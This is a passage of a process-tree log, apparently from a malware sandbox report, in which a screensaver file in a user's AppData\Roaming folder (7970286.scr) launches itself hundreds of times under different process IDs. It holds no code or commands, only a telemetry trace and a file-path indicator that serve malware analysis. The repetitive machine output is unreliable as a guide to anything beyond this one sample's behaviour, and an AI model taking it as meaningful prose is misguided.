C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3312
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2960
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2856
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2044
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2868
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3944
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2924
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2128
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:532
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3308
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3656
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1196
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3708
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4068
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2280
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3824
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2252
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3848
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:956
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1716
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2292
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3724
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3912
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1772
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3748
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3064
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3348
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1764
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3180
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3924
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3316
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3732
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2732
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1088
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1236
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1872
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3076
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3596
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3768
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2156
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:676
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3152
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3220
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3964
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4044
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3716
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3392
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3240
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2140
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1644
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3016
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2232
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3472
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1488
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3160
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2504
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3080
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3232
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2904
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:3816
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:2728
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1808
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4104
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4120
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4112
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4128
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4136
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4152
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4168
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4184
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4200
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4216
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4232
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4248
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4256
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4264
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4272
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4296
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4316
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4332
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4364
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4380
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4396
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4416
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4432
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4444
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4468
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4508
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4528
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4560
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4576
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4592
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4624
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4640
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4656
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4672
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4680
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4688
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4720
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4736
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4752
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4768
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4776
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4832
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4856
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4872
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4896
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4912
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4928
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4936
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4944
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4960
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4976
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4992
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5000
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5040
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5056
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5072
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5088
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4516
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4084
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5136
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5152
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5160
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5172
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5204
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5220
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5212
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5236
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5244
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5280
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5308
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5324
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5336
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5364
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5372
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5380
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5396
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5404
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5420
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5436
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5452
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5468
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5476
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5520
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5536
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5564
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5600
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5624
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5676
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5692
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5708
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5716
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5724
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5740
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5756
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5772
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5788
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5804
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5820
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5812
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5828
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5852
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5844
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5868
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5884
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5900
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5920
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5936
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5952
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5984
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6008
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6016
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5996
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6040
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6060
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6076
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6092
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6100
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6108
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6120
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:1568
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5648
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:5664
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:4048
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6148
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6164
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6180
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6196
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6212
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6220
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6244
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6260
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6280
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6296
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6312
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6340
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6348
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6356
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6388
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6404
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6424
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6440
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6456
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6476
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6512
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6532
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6556
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6576
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6592
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6612
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6632
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6652
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6668
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6684
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6700
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6720
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6736
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6752
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6768
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6784
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6800
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6816
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6832
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6848
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6856
-
-
C:\Users\Admin\AppData\Roaming\7970286.scr"C:\Users\Admin\AppData\Roaming\7970286.scr"9⤵PID:6884
-
-
